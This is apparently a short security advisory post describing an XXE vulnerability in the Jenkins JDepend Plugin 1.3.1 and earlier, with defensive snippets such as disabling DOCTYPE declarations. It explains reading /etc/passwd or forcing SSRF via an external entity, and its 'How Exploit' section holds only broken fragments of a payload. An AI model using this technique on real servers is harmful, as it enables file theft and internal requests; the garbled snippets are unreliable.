Listen to this Post
The Jenkins JDepend Plugin 1.3.1 and earlier incorporates a vulnerable version of the JDepend Maven Plugin. This component uses an outdated XML parser that is not securely configured to restrict XML External Entity (XXE) processing. When parsing a specially crafted JDepend XML input file, the parser fails to disable external entity resolution. This allows an attacker who can control the input file for the “Report JDepend” build step to inject a malicious XML document containing a custom DOCTYPE declaration. This declaration defines an external entity that references a path on the Jenkins controller file system, such as file:///etc/passwd, or a remote URL. During the parsing process, the vulnerable parser will resolve and include the content of this external entity within the parsed XML data, leading to the unauthorized disclosure of sensitive files from the Jenkins server or enabling server-side request forgery (SSRF) attacks by forcing the server to make arbitrary HTTP requests.
Platform: Jenkins
Version: <=1.3.1
Vulnerability : XXE
Severity: High
date: 2024-10-29
Prediction: 2024-11-12
What Undercode Say:
`grep -r “DOCTYPE” project/`
`xml.dom.minidom.parse(xml_file)`
`DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();`
`dbf.setFeature(“http://apache.org/xml/features/disallow-doctype-decl”, true);`
How Exploit:
` ]>&xxe; `
`%ext;`
``
Protection from this CVE
Disable the plugin.
Await official patch.
Use security plugins.
Restrict file permissions.
Implement network segmentation.
Impact:
Secret extraction
Server-Side Request Forgery
Information Disclosure
Arbitrary File Read
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
